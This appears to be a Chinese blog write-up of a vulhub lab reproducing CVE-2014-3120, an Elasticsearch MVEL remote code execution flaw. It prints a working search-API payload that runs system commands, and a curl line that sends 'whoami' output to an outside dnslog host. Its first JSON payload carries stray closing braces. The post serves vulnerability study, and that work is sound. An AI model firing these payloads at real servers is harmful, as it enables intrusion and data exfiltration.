【vulhub】ElasticSearch 命令执行漏洞(CVE-2014-3120)漏洞验证与getshell

最新推荐文章于 2024-06-10 22:26:11 发布
最新推荐文章于 2024-06-10 22:26:11 发布
阅读量952 收藏
点赞数
分类专栏: ElasticSearch vulhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/119355895
版权

漏洞详情

老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。elasticsearch版本:v1.1.1

详细过程请看

CVE-2014-3120 (命令执行漏洞)
这里楼主只复现2个payload

页面

/_search?pretty

post传参

payload1

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}
    }
}

在这里插入图片描述

payload2

dnslog获取一个dns地址
在这里插入图片描述
拼接命令

curl `whoami`.gp4pts.dnslog.cn

进行base64编码
在这里插入图片描述
替换相应的payload,然后重发包
在这里插入图片描述
成功回显
在这里插入图片描述
参考文章:
https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120

樱浅沐冰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ElasticSearch 命令执行漏洞CVE-2014-3120
weixin_59086772的博客
01-04 1950
0x00前言 Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 0x01漏洞原理 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 0x02影响版本 jre版本:openjdk:8-jre elasticsearch版本:v1.1.1 0x03环境搭建 do
利用Vulnhub复现漏洞 - ElasticSearch 命令执行漏洞CVE-2014-3120)测试环境
JiangBuLiu的博客
07-02 2518
ElasticSearch 命令执行漏洞CVE-2014-3120)测试环境Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现处理办法 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/ 漏洞原理 相关文档:http://bouk.co/blog/elasticsearch-rce/ 、...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法
weixin_33894992的博客
03-08 887
tang3 · 2015/03/07 14:170x00 漏洞概述要结合上一篇文章《ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427)》一起来看,我第一次知道CVE-2015-1427这个漏洞是在2月13日(春节放假前一天),但是当时想着过年,而且觉得应该是Groovy自身的问题,就也没太在意。知道前两天兰少(lupin)问我有没有看这个漏洞,说他找到了...
开源项目Elastic Shell发布
晴耕小筑
03-26 195
经过一段时间的筹划,作为“晴耕小筑”的一档新栏目“晴耕工坊”终于和诸位见面了!该栏目汇集了“晴耕小筑”以往公开的原创小品。比如,近期发布的Elastic Shell,便是由“晴耕工坊”隆重推出的一个开源项目。其作用是提供一组Shell脚本,用来管理Elasticsearch搜索引擎,稍后还将详细介绍。除此以外,还有部分笔者早年的开源小品,也一并收录于此。未来,还会有更多开源项目通过“晴耕工坊”对外...
cve_2014_3120-Elasticsearch-rce-vulfocus靶场
最新发布
c0529的博客
06-10 465
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。知识点普及:1、Elasticsearch,是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。
ElasticSearch Groovy远程代码执行POC和exp
热门推荐
Exploit的小站~
05-10 1万+
 ElasticSearch的这个漏洞的编号是CVE-2015-1427,影响版本为1.3.0-1.3.7以及1.4.0-1.4.2,漏洞成因详见:http://drops.wooyun.org/papers/5107,本文具体探讨一下漏洞利用。 1.2.0版本默认是禁用了脚本执行,如果要使用该功能的话,要在elasticsearch.yml中设置script.disable_dynami...
CVE-2014-3120 ElasticSearch 命令执行漏洞
weixin_51387754的博客
11-16 1840
漏洞简介 ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。支持通过HTTP使用JSON进行数据索引。 ElasticSearch有脚本执行的功能,使用的引擎为MVEL,该引擎没有做任何的防护,或者沙盒包装,所以可以直接执行任意代码。 由于在ElasticSearch的默认配置下,动态脚本执行功能处于打开状态,导致用户可以构造恶意的请求包,执行任意代码。 漏洞复现 通过_search方法的参数传入恶
未授权访问漏洞的检测与利用
Yanug
05-07 2935
一、redis未授权访问漏洞 漏洞描述 redis安装完以后,默认是没有账号密码的(安装redis详细可参考:redis相关笔记,如果redis是以root权限去运行,则可以被反弹shell或者写入ssh密钥,从而被获取服务器的权限。 漏洞检测 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) ...
ElasticSearch 命令执行漏洞CVE-2014-3120),我的头条面试经历分享
jixuczy的博客
04-03 1183
返回201状态码,代表创建成功;利用该漏洞的Payload如下**:**Accept:MSIE 9.0;Win64;x64;
ElasticSearch漏洞复现
hapenl的博客
01-06 1529
Elasticsearch(以下简称ES)是目前全文搜索引擎的首选。它是一个基于 Lucene 的搜索服务器,提供了一个分布式多用户能力的全文搜索引擎,它同时基于 RESTful Web 接口,可以快速地储存、搜索和分析海量数据。ES安装部署成功后,默认端口是9200。对ES中存储的数据进行查询分析,使用关键字_search。本文介绍了CVE-2014-3120CVE-2015-1427漏洞复现
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞CVE-2015-1427)被发现,影响...
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
跨站脚本执行漏洞详解与防护
01-20
本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该...
elasticsearch-analysis-ik-8.11.0
11-27
4. 测试:通过Elasticsearch的API进行测试,验证分词效果,如使用`GET /_analyze`接口。 除了基本功能,IK分词插件还提供了丰富的扩展性,用户可以通过编写自定义插件或修改分析器配置来实现特定的分词需求。`...
elasticsearch-analysis-dynamic-synonym-7.6.2
08-17
1. **下载与安装**:将`elasticsearch-analysis-dynamic-synonym-7.6.2.jar`文件复制到ES的`plugins`目录下,然后重启ES服务,系统会自动识别并加载插件。 2. **配置文件**:创建`synonyms.txt`文件,包含同义词...
ElasticSearch命令执行漏洞(CVE-2014-3120)
ANOrange的博客
03-30 655
Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 影响版本:ES
CVE漏洞复现-CVE-2014-3120-ElasticSearch 命令执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 662
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。进入MSF框架,search CVE-2014-3120,然后进入对应模块,设置好参数即可攻击。本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场。检测环境端口是否开放。
ElasticSearch(三)】_cat查看信息 、put&post新增数据、GET 查询数据、乐观锁
u012161251的博客
08-24 434
ElasticSearch(三)】_cat查看信息 、put&post新增数据、GET 查询数据、乐观锁 一、_cat 查看信息 GET _cat/nodes: 查看所有节点 用postman访问 http://localhost:9200/_cat/nodes GET _cat/health: 查看es健康状况 green:健康 后面的数字:集群分片信息 GET ...
elasticsearch Apache Log4j 远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046)
03-07
这是一个安全漏洞问题,我可以回答。elasticsearch和Apache Log4j都存在远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046),攻击者可以利用这些漏洞在受影响的系统上执行任意代码。建议用户尽快更新相关软件版本或采取其他安全措施来保护系统安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值